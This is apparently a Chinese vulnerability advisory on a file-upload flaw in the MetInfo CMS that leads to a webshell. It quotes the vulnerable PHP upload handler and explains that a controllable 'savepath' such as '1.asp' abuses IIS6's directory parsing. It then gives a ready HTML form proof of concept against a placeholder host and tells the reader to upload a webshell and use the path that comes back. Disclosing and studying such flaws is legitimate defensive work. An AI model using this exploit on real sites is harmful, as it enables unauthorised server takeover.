酷应用

MetInfo 鸡肋getshell

技术作者：HackerEye 2018-08-24 08:54:18

发布时间：2017-01-02
公开时间：N/A
漏洞类型：文件上传
危害等级：高
漏洞编号：xianzhi-2017-01-73318655
测试版本：N/A

漏洞详情

app/system/include/module/uploadify.class.php 65行

public function doupfile(){
        global $M;
        $this->upfile->set_upfile();
        $info['savepath'] = $_M['form']['savepath'];
        $info['format'] = $_M['form']['format'];
        $info['maxsize'] = $_M['form']['maxsize'];
        $info['is_rename'] = $_M['form']['is_rename'];
        $info['is_overwrite'] = $_M['form']['is_overwrite'];
        $this->set_upload($info);
        $back = $this->upload($_M['form']['formname']);
        if($_M['form']['type']==1){
            if($back['error']){
                $back['error'] = $back['errorcode'];
            }else{
                $backs['path'] = $back['path'];
                $backs['append'] = 'false';
                $back = $backs;
            }
        }
        echo jsonencode($back);
    }

$_M['form']来自$(POST|GET|COOKIE) savepath可控导致且当目录不存在时自动新建导致IIS6下解析漏洞getshell

测试方法

<form id="form" action="http://xxxxx.com/app/system/entrance.php?c=uploadify&a=doupfile" method="POST" enctype ="multipart/form-data"&gt;
savepath:<input type="text" name="savepath" value="1.asp"><br />
format:<input type="text" name="format" value="rar|zip|sql|doc|pdf|jpg|xls|png|gif|mp3|jpeg|bmp|swf|flv|ico"><br />
maxsize:<input type="text" name="maxsize" value="1111111111111111"><br />
is_rename:<input type="text" name="is_rename" value="0"><br />
is_overwrite:<input type="text" name="is_overwrite" value="1"><br />
formname:<input type="text" name="formname" value="file"><br />
<input type="file" name="file">
<input type="submit" value="submit">
</form>
<br />

选择一个后缀在上面列表中的马submit即可返回带路径直接用